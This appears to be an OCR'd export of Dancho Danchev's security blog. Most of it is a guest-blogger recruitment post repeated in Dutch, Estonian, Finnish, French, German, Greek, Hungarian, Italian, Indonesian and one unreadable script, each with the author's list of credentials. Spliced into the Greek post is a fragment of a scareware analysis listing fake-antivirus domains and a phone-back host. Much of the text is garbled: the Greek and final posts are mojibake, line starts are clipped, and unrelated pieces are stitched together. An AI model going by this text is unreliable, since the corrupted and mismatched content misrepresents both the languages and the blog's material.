van de SolarWinds aanval - PaloAltoNetworks | Vond malware op de website van Flashpoint 
| Traceerde en profileerde het Koobface Botnet en ontmaskerde een botnet operator | Kwam 
twee keer op Slashdot | Mijn Persoonlijke Blog kreeg 5.. 6M Page Views Since December, 2005 
| My old Twitter Account got 11,000 followers | | had an average of 7,000 RSS readers on my 
blog | |have my own vinyl "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" 
made by a Canadian artist | Currently running Astalavista.box. sk | Ik gaf een interview aan 
DW over het Koobface-botnet | Ik gaf een interview aan NYTimes over het Koobface-botnet | Ik 
gaf een interview aan Russian OSINT | Opgenomen als een belangrijke concurrent door Jeffrey 
Carr’s Taia Global | Gepresenteerd bij de GCHQ | Gepresenteerd bij Interpol | Gepresenteerd bij 
InfoSec | Gepresenteerd bij CyberCamp | Gepresenteerd bij RSA Europe". 


OPMERKING: Uw gastartikel kan zowel in het Engels als in uw moedertaal worden geschreven. 
Laten we dit doen! 


Stuur mij een e-mail in het Engels op dancho.danchev@hush.com waarin u informeert naar 
deze mogelijkheid, inclusief een korte introductie met eventueel een LinkedIn-profiel of een 
CV, en ik neem binnenkort contact met u op met het idee om u in te schrijven en voor te 
stellen als officiéle Gastblogger op mijn persoonlijke blog. 


Blijf op de hoogte! 


1. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEjDerQ_wbvMpjTGZ3xjVk1ZZK1qVjDEt8EAIUQHQ1pr8z7c 
16mXkTAQwr-kOKnPqQ3IIFhvp100xA8QU6 JxtD7N2eFRJyuZSdh0e_ 


18.11.18 Kes tahab saada kulalisblogijaks selles blogis? (2022-11-02 11:48) 


[1] 
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FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Lugupeetud blogi lugejad, 


Kas te teate palju infoturbe kuberkuritegevuse uurimise OSINT ja ohu luureandmete kogumise 
kohta, sealhulgas kuberohtude osalejate uurimise kohta? Kas olete huvitatud saada kuUlalis- 
blogijaks selles blogis, kus teil on véimalik jouda Uhe parima ja kdige mitmekesisema pub- 
likuga julgeolekutdd6stuses alates 2005. aasta detsembrist, mis koosneb turvaekspertidest, 
teadlastest, mUUjatest ja organisatsioonidest, sealhulgas kuberkuritegevuse uurijatest USA lu- 
ureteenistuse ja diguskaitseasutuste ja -organisatsioonide seas? 


Kes on Dancho Danchev ja mis on Dancho Danchevi blogi? 


"Sdoltumatu todvotja | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely Horse 
osaleja | Slashdotted kaks korda | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award | Won SC- 
Magazine Award | Took Down the Koobface Botnet | Presented at the GCHQ with the Honeynet 
Project | SCMagazine Who to Follow on Twitter for 2011 | Participated in a Top Secret GCHQ 
Program called "Lovely Horse" | Identified a major victim of the SolarWinds Attack - PaloAl- 
toNetworks | Found malware on the Web Site of Flashpoint | Tracked monitored and profiled 
the Koobface Botnet and exposed one botnet operator | Made it to Slashdot two times | My 
Personal Blog got 5. 6M Page Views alates detsembrist, 2005 | Minu vana Twitter konto sai 
11,000 jalgijad | Mul oli keskmiselt 7,000 RSS lugejad minu blogi | Mul on oma vinuUul "Blue Sab- 
bath Black Cheer / Griefer - We Hate You Dancho Danchev" tehtud Kanada kunstnik | Praegu 
todtab Astalavista.box. sk | Andsin intervjuu DW-le Koobface botneti kohta | Andsin intervjuu 
NYTimesile Koobface botneti kohta | Andsin intervjuu Vene OSINT-le | Jeffrey Carri Taia Globali 
poolt peamise konkurendina loetletud | Esines GCHQ-s | Esines Interpolis | Esines InfoSecis | 
Esines CyberCampis | Esines RSA Europe’is”. 


MARKUS: Teie kiilalispostituse artiklid véivad olla kirjutatud kas inglise véi emakeeles. Teeme 
seda! 


Saatke mulle e-kiri inglise keeles aadressil dancho.danchev@hush.com seoses selle voimaluse 
kohta paringuga, mis sisaldab luhikest tutvustust, sealhulgas vOimalusel LinkedIn-profiili voi CV- 
d, ja ma votan teile peagi Uhendust, et varvata teid ja tutvustada teid ametliku kUlalisblogijana 
minu isiklikus blogis. 
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Ole kursis! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhqdvAnWDNvDz7S1furwg JTCINku-7Qcu2naWVpyit7sZ19b 
PGs_1I0Ec4x-99ywNj7COO-IoP_xuTQlmw5-Dz7uF--3xvlwbOyrci 


18.11.19 Kuka haluaa tulla vieras bloggaaja tassa blogissa? (2022-11-02 11:49) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
mail: dancho.danchev@hush.com 


Hyvat blogin lukijat, 


Tiedatk6 paljon tietoturvasta kyberrikollisuuden tutkimuksesta OSINT ja uhkatiedustelun 
keraamisesta, mukaan lukien kyberuhkatoimijoiden tutkimus? Oletko kiinnostunut ry- 
htymaan vierailevaksi bloggaajaksi tahan blogiin, jossa voit tavoittaa yhden parhaista 
ja monipuolisimmista yleisdista tietoturva-alalla joulukuusta 2005 lahtien, joka koostuu 
tietoturva-asiantuntijoista, tutkijoista, myyjista ja organisaatioista, mukaan lukien tietoverkko- 
rikollisuuden tutkijat, Yhdysvaltain tiedustelupalveluyhteiso ja lainvalvontaviranomaiset ja - 
organisaatiot? 


Kuka on Dancho Danchev ja mika on Dancho Danchevin blogi? 


"Itsenainen urakoitsija | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took Down the Koobface Botnet | Presented at the GCHQ with the 
Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Osallistui GCHQ:n huip- 
pusalaiseen ohjelmaan nimelta "Lovely Horse" | Tunnistettiin SolarWinds-hyékkayksen merkit- 
tava uhri - PaloAltoNetworks | Loytyi haittaohjelmia Flashpointin verkkosivuilta | Jaljitettiin 
Koobface-botverkkoa ja paljastettiin yksi bottiverkon yllapitajista | Paasi Slashdotiin kaksi ker- 
taa | Henkildkohtainen blogini sai 5. sijan. 6M Page Views Joulukuusta 2005 lahtien | Vanha 
Twitter-tilini sai 11 000 seuraajaa | Minulla oli keskimadarin 7 000 RSS-lukijaa blogissani | Min- 
ulla on oma vinyyli "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev'", jonka 
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on tehnyt kanadalainen taiteilija | Talla hetkella kaynnissa Astalavista.box. sk | Annoin haastat- 
telun DW:lle Koobface-bottiverkosta | Annoin haastattelun NYTimesille Koobface-bottiverkosta | 
Annoin haastattelun venalaiselle OSINT: lle | Jeffrey Carrin Taia Global on listannut minut merkit- 
tavaksi kilpailijaksi | Esitelty GCHQ:ssa | Esitelty Interpolissa | Esitelty InfoSecissa | Esitelty 
CyberCampissa | Esitelty RSA Europessa" 


HUOMAUTUS: Guest Post -artikkelisi voidaan kirjoittaa joko englanniksi tai omalla didinkielellasi. 
Tehdaan tasta totta! 


Laheta minulle sahkdpostia englanniksi osoitteeseen dancho.danchev@hush.com, jossa 
tiedustellaan tata tilaisuutta, mukaan lukien lyhyt esittely ja mahdollisesti LinkedIn-profiili tai 
ansioluettelo, ja palaan pian takaisin sinulle ajatuksella varvata sinut ja esitella sinut virallisena 
vierasbloggaajana henkildkohtaisessa blogissani. 


Pysy kuulolla! 


1. https://blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEhcDL7dWYAQy4gn_T90UKHot-d-yA2JWwRN18Z4mqGt 9YvDR 
kOdwjpThwSzGUwgv0OPwhYjsSc4pn49ZyPeDRoq_ofvEiyOxZGvPP7_ 


18.11.20 Qui veut devenir un blogueur invité sur ce blog? (2022-11-02 11:50) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Chers lecteurs du blog, 


Vous avez des connaissances approfondies en matiére de sécurité de l'information, de 
recherche sur la cybercriminalité, d’OSINT et de collecte de renseignements sur les menaces, 
y compris la recherche sur les acteurs de la cybermenace ? Etes-vous intéressé a devenir 
un blogueur invité sur ce blog oU vous serez en mesure d’atteindre I’un des meilleurs et des 
plus divers auditoire dans l'industrie de la sécurité depuis Décembre, 2005 qui se compose 
d’experts en sécurité, des chercheurs, des fournisseurs et des organisations, y compris les 
chercheurs de la cybercriminalité, la communauté de renseignement des Etats-Unis et les or- 
ganismes d’application de la loi et les organisations ? 
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Qui est Dancho Danchev et quel est le blog de Dancho Danchev ? 


"Entrepreneur indépendant | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | 
Lovely Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal 
Award | Won SCMagazine Award | Démantelé le botnet Koobface | Présenté au GCHQ avec le 
projet Honeynet | SCMagazine Who to Follow on Twitter for 2011 | Participé a un programme 
top secret du GCHQ appelé "Lovely Horse" | Identifié une victime majeure de |’attaque Solar- 
Winds - PaloAltoNetworks | Trouvé un malware sur le site Web de Flashpoint | Suivi, surveillé et 
profilé le botnet Koobface et exposé un opérateur de botnet | Fait deux fois Slashdot | Mon blog 
personnel a obtenu 5. Je possede mon propre vinyle "Blue Sabbath Black Cheer / Griefer - We 
Hate You Dancho Danchev'", fabriqué par un artiste canadien | Je dirige actuellement Astalav- 
ista.box. sk | J’ai donné une interview a DW sur le botnet Koobface | J’ai donné une interview a 
NYTimes sur le botnet Koobface | J’ai donné une interview a Russian OSINT | Listé comme un 
concurrent majeur par Taia Global de Jeffrey Carr | Présenté au GCHQ | Présenté a Interpol | 
Présenté a InfoSec | Présenté a CyberCamp | Présenté a RSA Europe". 


REMARQUE : Vos articles de Guest Post peuvent étre rédigés en anglais ou dans votre langue 
maternelle. C’est parti! 


Envoyez-moi un e-mail en anglais a l’adresse dancho.danchev@hush.com pour m’informer de 
cette opportunité, en incluant une bréve présentation et éventuellement un profil LinkedIn 
ou un CV, et je vous répondrai rapidement pour vous recruter et vous présenter en tant que 
blogueur invité officiel sur mon blog personnel. 


Restez a |’écoute! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjVy1WO5W7mcZeKhqKeAz5805N1F6UZcXpvDeH6MSpxpAvJG 
rZ1KdVbc-BilcqtSwMVOL5zkDuBAyLy02LiacTLVB5NJE71J8KONBN 


18.11.21 Wer mochte Gastblogger in diesem Blog werden? (2022-11-02 11:51) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
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Liebe Blog-Leser, 


Wissen Sie viel Uber Informationssicherheit, Cyberkriminalitat, OSINT und das Sammeln von 
Informationen Uber Bedrohungen, einschlieBlich der Suche nach Cyberbedrohungsakteuren? 
Sind Sie daran interessiert, Gastblogger in diesem Blog zu werden, wo Sie eines der besten 
und vielfaltigsten Publikums in der Sicherheitsbranche erreichen kdnnen, das sich seit Dezem- 
ber 2005 aus Sicherheitsexperten, Forschern, Anbietern und Organisationen zusammensetzt, 
einschlieBlich Cybercrime-Forschern, der US Intelligence Community und Strafverfolgungsbe- 
hdrden und -organisationen? 


Wer ist Dancho Danchev und was ist Dancho Danchevs Blog? 


"Unabhangiger Unternehmer | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | 
Lovely Horse Teilnehmer | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal 
Award | Won SCMagazine Award | Took Down the Koobface Botnet | Presented at the GCHQ 
with the Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Participated ina 
Top Secret GCHQ Program called "Lovely Horse" | Identified a major victim of the SolarWinds 
Attack - PaloAltoNetworks | Found malware on the Web Site of Flashpoint | Tracked monitored 
and profiled the Koobface Botnet and exposed one botnet operator | Made it to Slashdot two 
times | My Personal Blog got 5. 6 Mio. Seitenaufrufe seit Dezember 2005 | Mein alter Twitter- 
Account hat 11.000 Follower | Ich hatte durchschnittlich 7.000 RSS-Leser auf meinem Blog | 
Ich habe meine eigene Schallplatte "Blue Sabbath Black Cheer / Griefer - We Hate You Dan- 
cho Danchev", die von einem kanadischen Kunstler angefertigt wurde | Ich betreibe derzeit 
Astalavista.box. sk | Ich habe der DW ein Interview Uber das Koobface-Botnetz gegeben | Ich 
habe der NYTimes ein Interview Uber das Koobface-Botnetz gegeben | Ich habe der Russian 
OSINT ein Interview gegeben | Von Jeffrey Carrs Taia Global als wichtiger Konkurrent aufgefuhrt 
| Beim GCHQ vorgestellt | Bei Interpol vorgestellt | Beim InfoSec vorgestellt | Beim CyberCamp 
vorgestellt | Bei der RSA Europe vorgestellt" 


HINWEIS: Ihre Gastbeitrage k6nnen entweder auf Englisch oder in Ihrer Muttersprache verfasst 
werden. Lassen Sie uns dies verwirklichen! 


Schicken Sie mir eine E-Mail auf Englisch an dancho.danchev@hush.com, in der Sie sich nach 
dieser Moglichkeit erkundigen und mir eine kurze Vorstellung geben, mdglicherweise mit einem 
LinkedIn-Profil oder einem Lebenslauf, und ich werde mich in Kurze bei Ihnen melden, um Sie 
als offiziellen Gastblogger in meinem personlichen Blog vorzustellen. 


Bleiben Sie dran! 


1. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEgzKQ8-BAihrisOWNTOPhtztI1_U17-CxNOkYc4S9SQax9De 
sIzrN57o0FnDy4HXx3It1LFUnmoWNLtQ2V11Le9NBGI1i-WbUukLdgeA 


18.11.22 Motoc OéAEt va yivet emtoKkéentns blogger oe auto To blog; (2022-11-02 11:52) 


[1] 
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search-scanonline .net 
searchsecureguard .net 
secure-systemguard .net 
system-guard .net 
systemguard-zone .com 
systemguard-zone .net 
systemprotected .net 
systemscan-secure .net 
trust-systemprotect .com 
trust-systemprotect .net 
trustsystem-protection .com 
trust-systemprotection .net 
windows-protectionsuite .net 
windows-systemguard .net 
windows-virusscan .net 
winprotection-suite .com 


[13]Sampled scareware also [14]phones-back to mysecurityguru .cn - 64.86.16.170 - 
Email: andrew.foecket@gmail.com, the same phone-back domain was used in the scareware 
sampled from the [15]NYTimes.com malvertising attack, with the same email also belonging 
to a scareware domain (mainsecsys .info) listed in the [16]Diverse Portfolio of Fake Security 
Software - Part Twenty Two for July. 


The cybercrime powerhouse behind all these attacks, continues maintaining the largest 
market share of [17]systematic Web 2.0 abuse, and that includes their involvement in [18]the 
Koobface botnet. 


Related posts: 

[19]Dissecting Koobface Worm’s Twitter Campaign 

[20]Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware 
[21]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 
[22]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[23]The Twitter Malware Campaign Wants to Bank With You 
[24]Does Twitter’s malware link filter really work? 

[25]Commercial Twitter spamming tool hits the market 
[26]Cybercriminals hijack Twitter trending topics to serve malware 
[27]Spammers harvesting emails from Twitter - in real time 
[28]Twitter hit by multiple variants of XSS worm[29] 


This post has been reproduced from [30]Dancho Danchev’s blog. 


1. http: //blogs.zdnet .com/security/?p=3178 
2. http://blogs.zdnet .com/security/?p=183 

3. http://blogs.zdnet .com/security/?p=429 
4. 


ttp://2.bp.blogspot .com/_wICHhTiQmrA/SigkzSv-sLI/AAAAAAAADrw/pPcRifZSU6U/s1600-h/blackhat_seo_ddanchev_ 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Ayamntot avayvwotes Tov totoAoytou, 


TuwpiTete MOAAG OYXETIKA WE THY AOMGAELA TANPOMOPLWYV THY EPEVVA YLA TO KUBEPVOEYKANUa 
OSINT Kat TNH GVAAOCYA TANPOMOPLWV YyLa ATIELAEG, OUUTIEPLAGUBAVOHEVNG THC EPEVVACG YLO 
Touc mopeic anelAWV OTOV KUBEPVOXWPO; EvotapepEoteE va yivete Guest Blogger of aut TO 
LOTOAOYLO, OTIOV 8a UMOPE(TE Va TIPOOEYVYLOETE EVA ATG TA KAAUTEPA KQL MILO TOLK(AG AKPOATHPLA 
OTOV KAGSO TNS AoMaAELAG amd Tov AEKEUBPLO Tov 2005, to omoio anoTEAEitat and ELSLKOUG 
O€ DEUATA AOMGAELAG EPEUVNTEG TIPOUNVEVTEG KAL OPYAVLOHONG, GUUTIEPLAGUBAVOHEVWY TWY 
EPEUVATWV KUBEPVOEYKAHUATOG THV KOLVOTNTA TANPO*gOPLWYV TWV HNA Kal Tic UMNpEOlES Kat 
OpYyavlioyovc EMLBOANS Tou vdouOU; 


Notoc efvat o Dancho Danchev kat moto Eefvat To LaotOASYLO TOV Dancho Danchev; 


"Independent Contractor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took Down the Koobface Botnet | Napovoitdotnke oto GCHQ 
Ue tO Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | ZuupEteEtye o€ 
Eva AKPWSG aNdppnto mpdypauWa tou GCHQ HE TNhv ovoyaota "Lovely Horse" | Evtdémioe Eva 
ONUAVTLKO BUA TNC EmMiBeonc SolarWinds - PaloAltoNetworks | BornkKe KaKO6BovAO AOYLOULKO 
OTNV lotodEAiSa Tov Flashpoint | NapakoAovOnoe Kat oKt\ayPagnNoOE TO Koobface Botnet Kat 
efEGOEoE Evav XELMLOTH Tov botnet | Egptace oto Slashdot 500 mopec | To MPOOWMLKS YOU blog 
TINpE 5. 6M Page Views amd tov AeKeEuBPto tov 2005 | O naAtdc Hou Aoyaptacuds oto Twitter 
€xet 11.000 followers | E(ya katé& YEO 6po 7.000 avayvwotec RSS oto blog you | Exw To &tkd 
You BLv0ALo "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" @TttayuEvo and 
Evav Kavad6 KaAALTEXVN | AUTH Th OTLyUN TpEXEL To Astalavista.box. sk | E6woa ouvévtevEn 
otnv DW yia to Koobface Botnet | Eiwoa ouvévtevEn otoucg NYTimes yta to Koobface bot- 
net | ESwoa ovvévtevEn oto Russian OSINT | Avagépetat WG ONUAVTLKOG AVTAYWVLOTHSG amd 
tnv Taia Global tov Jeffrey Carr | Napovotdotnke otnv GCHQ | Napovotdotnke otnv Interpol 
| Mapovotdotnke oto InfoSec | Napovotdotnke oto CyberCamp | Napovotdotnke oto RSA Eu- 
rope" 


ZHMEIQZH: Ta adp8pa oac Guest Post uMopobv va Eivat ypauYEva E(TE OTA AYYALKG E(TE OTN 
UNTPLKH Oac yYAWOoa. Ac TO KGVOULHE auto! 


26273 


YTE(ATE HOD EVA UAVUUA NAEKTPOVLKOD TaxvbPouEtoD OTA ayyALKa oTN StEvVBvVON dan- 
cho.danchev@hush.com do0ov agopad ThHV EPWTNON OXETLKA HE AUTH TNHv EvKatpia, 
OVUTIEPLAGUBAVOLUEVNG ULaG OUVTOUNS Mapovolaons mov 9a mEptAauBavet EevSEXoUEVWC Eva 
TPO@IA LinkedIn Hh Eva BLOyPAGLKO ONUE(WHA KAL OVUVTOUA Oa EMLKOLVWVYHOW YWAaCi oac HE THY 
LSEA VA GAC EMLOTPATEVOW KAL VA GAG TAPOVOLAGW WC EMionuo Guest Blogger oto MPOGWTILKO 
wou blog. 


Meivete OUVTOVLOLEVOL! 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEh7Cj_Ri7f£-FRg_A9Cx8e0zM3dPyaPwqJnhzCJdxi0Y8zU2t 
zYtWeTKVJ JDGuMMCMt ZZQbg2aReQoU4eM1CSH6E3rA3hVeY71Th9ha 


18.11.23 Ki szeretne vendégblogger lenni ebben a blogban? (2022-11-02 12:13) 


[1] 


FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Kedves blogolvasok! 


Sokat tudsz az informaciébiztonsag kiberbUndzés kutatas OSINT és fenyegetés hirszerzés 
gyljtésérél, beleértve a kiberfenyegetés szerepléinek kutatasat? Erdekli Ont, hogy vendég- 
blogger legyen ezen a blogon, ahol 2005 decembere 6ta a biztonsagi iparag egyik legjobb és 
legvaltozatosabb kéz6nségét érheti el, amely biztonsagi szakért6kb6él, kutat6kbdol, gyartékbol 
és szervezetekb6l all, beleértve a kiberbUndzés kutatdit, az amerikai hirszerzé k6zdsséget és 
a bUnuld6z6 szerveket és szervezeteket? 


Ki Dancho Danchev és mi Dancho Danchev blogja? 


"Fuggetlen vallalkozé | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse résztvev6 | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took Down the Koobface Botnet | Presented at the GCHQ with the 
Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Részt vett egy szigoruan 
titkos GCHQ programban, a "Lovely Horse" | Identified a SolarWinds Attack egyik f6 aldozatat 
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- PaloAltoNetworks | Found malware on the Web Site of Flashpoint | Tracked monitored and 
profiled the Koobface Botnet and exposed one botnet operator | Made it to Slashdot two times 
| My Personal Blog got 5. 6M Page Views Since December, 2005 | A régi Twitter fidkomnak 
11,000 kévetdje van | Atlagosan 7,000 RSS olvasdja volt a blogomnak | Van egy sajat bake- 
litlemezem "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev", amit egy 
kanadai mUuvész készitett | Jelenleg az Astalavista.box. sk | Interjut adtam a DW-nek a Koob- 
face botnetrél | Interjut adtam a NYTimes-nak a Koobface botnetrél | Interjut adtam az orosz 
OSINT-nek | Jeffrey Carr Taia Globalja jelentés versenytarsként szerepel | El6adtam a GCHQ-nal 
| Eldadtam az Interpolnal | Eldadtam az InfoSecnél | El6adtam a CyberCampneél | Eldadtam az 
RSA Europe-nal." 


MEGJEGYZES: Vendégposzt-cikkei angolul vagy az anyanyelvén is irhat6k. Csinaljuk meg! 


Kuldjon nekem egy e-mailt angol nyelven a dancho.danchev@hush.com cimre, hogy érdekl6d- 
jon errdl a lehetdéségrél, beleértve egy rovid bemutatkozast, beleértve esetleg egy LinkedIn- 
profilt vagy egy 6néletrajzot, és révidesen valaszolok Onnek az étlettel, hogy felvegye Ont, és 
bemutassa Ont hivatalos vendégbloggerként a személyes blogomban. 


Maradjon velunk! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgOtYtngKPIwxXoUGHhM1 cOoywwYjCO7175qEBibEgojJJxe 
OAM_9YD3KnpVkqupWfK5_RSdYeSBycRKCs-G1sZPONgX3jKc4nrBc1 


18.11.24 Chi vuole diventare Guest Blogger di questo blog? (2022-11-02 12:14) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Cari lettori del blog, 


siete esperti di sicurezza informatica, ricerca sulla criminalita informatica, OSINT e raccolta 
di informazioni sulle minacce, compresa la ricerca di attori di minacce informatiche? Siete 
interessati a diventare Guest Blogger di questo blog, dove sarete in grado di raggiungere uno 
dei migliori e piu diversificati pubblici all’interno del settore della sicurezza dal dicembre 2005, 
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composto da esperti di sicurezza, ricercatori, fornitori e organizzazioni, compresi i ricercatori di 
criminalita informatica, la comunita di intelligence degli Stati Uniti e le agenzie e organizzazioni 
di polizia? 


Chi € Dancho Danchev e qual é il Blog di Dancho Danchev? 


"Independent Contractor" | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Ha vinto il premio SCMagazine | Ha abbattuto la botnet Koobface | Presentato al GCHQ con 
il progetto Honeynet | SCMagazine Who to Follow on Twitter per il 2011 | Ha partecipato a un 
programma top secret del GCHQ chiamato "Lovely Horse" | Ha identificato una delle principali 
vittime dell’attacco SolarWinds - PaloAltoNetworks | Ha trovato malware sul sito Web di Flash- 
point | Ha monitorato e tracciato il profilo della botnet Koobface e ha smascherato un operatore 
della botnet | E finito su Slashdot due volte | II mio blog personale ha ottenuto 5. 6M di pagine 
viste dal 2005. 6 milioni di pagine viste da dicembre 2005 | II mio vecchio account Twitter ha 
ottenuto 11.000 follower | Ho avuto una media di 7.000 lettori RSS sul mio blog | Ho il mio vinile 
personale "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" realizzato da 
un artista canadese | Attualmente gestisco Astalavista.box. sk | Ho rilasciato un’intervista a 
DW sulla botnet Koobface | Ho rilasciato un’intervista al NYTimes sulla botnet Koobface | Ho 
rilasciato un’intervista a Russian OSINT | Elencato come uno dei principali concorrenti da Taia 
Global di Jeffrey Carr | Presentato al GCHQ | Presentato all’Interpol | Presentato a InfoSec | 
Presentato al CyberCamp | Presentato a RSA Europe”. 


NOTA: | vostri articoli di Guest Post possono essere scritti sia in inglese che nella vostra lingua 
madre. Facciamo in modo che questo accada! 


Inviatemi un’e-mail in inglese all’indirizzo dancho.danchev@hush.com per chiedere infor- 
mazioni su questa opportunita, includendo una breve presentazione e possibilmente un profilo 
LinkedIn o un CV, e vi rispondero a breve con l’idea di arruolarvi e presentarvi come Guest 
Blogger ufficiale del mio blog personale. 


Restate sintonizzati! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgPt qBcOTUWOT3gPCKKf QnW0JR1Say5Mu2UcnQbqSICWOP9 
jZ7arrX5f6JeJ8S8tHi7 27HZYX£MSp5yRxos2n09HjNhAXtttOTMSa 


18.11.25 Siapa yang Ingin Menjadi Blogger Tamu di Blog Ini? (2022-11-02 12:14) 


[1] 
26276 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Pembaca blog yang terhormat, 


Apakah Anda tahu banyak tentang penelitian keamanan informasi cybercrime OSINT dan 
pengumpulan intelijen ancaman termasuk penelitian aktor ancaman cyber? Apakah Anda ter- 
tarik untuk menjadi Blogger Tamu di blog ini di mana Anda akan dapat menjangkau salah satu 
audiens terbaik dan paling beragam dalam industri keamanan sejak Desember 2005 yang ter- 
diri dari para peneliti ahli keamanan, vendor dan organisasi termasuk peneliti kejahatan siber, 
Komunitas Intelijen AS, dan lembaga dan organisasi Penegak Hukum? 


Siapa Dancho Danchev dan apa itu Blog Dancho Danchev? 


"Kontraktor Independen | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Peserta 
Lovely Horse | Slashdotted Dua Kali | Ex-ZDNet | Ex-Webroot | Memenangkan Jessy H. Neal 
Award | Memenangkan SCMagazine Award | Menurunkan Koobface Botnet | Dipresentasikan 
di GCHQ dengan Proyek Honeynet | SCMagazine Who to Follow on Twitter untuk tahun 2011 | 
Berpartisipasi dalam Program GCHQ Rahasia Teratas yang disebut "Lovely Horse" | Mengiden- 
tifikasi korban utama Serangan SolarWinds - PaloAltoNetworks | Menemukan malware di Situs 
Web Flashpoint | Melacak memantau dan memprofilkan Koobface Botnet dan mengekspos satu 
operator botnet | Berhasil masuk ke Slashdot dua kali | Blog Pribadi saya mendapat 5. 6M Page 
Views Sejak Desember, 2005 | Akun Twitter lama saya mendapat 11.000 follower | Saya memi- 
liki rata-rata 7.000 pembaca RSS di blog saya | Saya memiliki vinyl sendiri "Blue Sabbath Black 
Cheer / Griefer - We Hate You Dancho Danchev" yang dibuat oleh seniman Kanada | Saat ini 
menjalankan Astalavista.box. sk | Saya memberikan wawancara kepada DW tentang Koobface 
Botnet | Saya memberikan wawancara kepada NYTimes tentang Koobface botnet | Saya mem- 
berikan wawancara kepada OSINT Rusia | Terdaftar sebagai pesaing utama oleh Jeffrey Carr’s 
Taia Global | Dipresentasikan di GCHQ | Dipresentasikan di Interpol | Dipresentasikan di InfoSec 
| Dipresentasikan di CyberCamp | Dipresentasikan di RSA Europe" 


CATATAN: Artikel Posting Tamu Anda dapat ditulis dalam bahasa Inggris atau dalam bahasa ibu 
Anda. Mari kita wujudkan ini! 


Kirimkan saya email dalam bahasa Inggris di dancho.danchev@hush.com dalam_ hal 
menanyakan tentang kesempatan ini termasuk perkenalan singkat termasuk mungkin profil 
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LinkedIn atau CV dan saya akan segera menghubungi Anda kembali dengan ide untuk mendaf- 
tarkan Anda dan menghadirkan Anda sebagai Blogger Tamu resmi di blog pribadi saya. 


Pantau terus! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgGADnt V7VGXnkShVva34DeD1zty078tued8wbgusFvfHSfd 
MQss1LhAz80Lrr7dnknpdnks5SC64bRb1s jNmKg9P2vQxPpN3TsMnUu 


18.11.26 QQQUU0UU0000000000000 (2022-11-02 12:15) 
[1] 


Dancho Danchev's Vlog 


ost: Dancho Danchev 
osition: Independent Contractor 
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QOOUU0000000 0000000009 $!N TOGO Oeao002 00512 
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"Independent Contractor[JAstalavista.com 2003-2006[JAstalavista.box.sk 2020- 
2022[JLovely Horse Participant]Slashdotted Two  Times[jEx-ZDNet[JEx-Webroot]]Won 

Jessy H. Neal Award]jWon Scheme of the WorldjDancho Danchev’s Blog[]Dancho 
DanchevQ0000000000SCMagazinefUUUkKoobfaceQQ00000006CH QO000000000000000SCMagazi 

ne 2011 (fTwitterQQ0000000GCHQONON0ooobovely = HorseQQ00SolarWindsQQQ00000000 
PaloAltoNetworks{Q000000000WebQOU000000000 Ko obfaceQ0000000000 00000001 000800000 
OUOUOO0USlashdot2Q0000000005. 200591 2000600000000 00000oTwitterQQ00001 1,000 0000000000000 
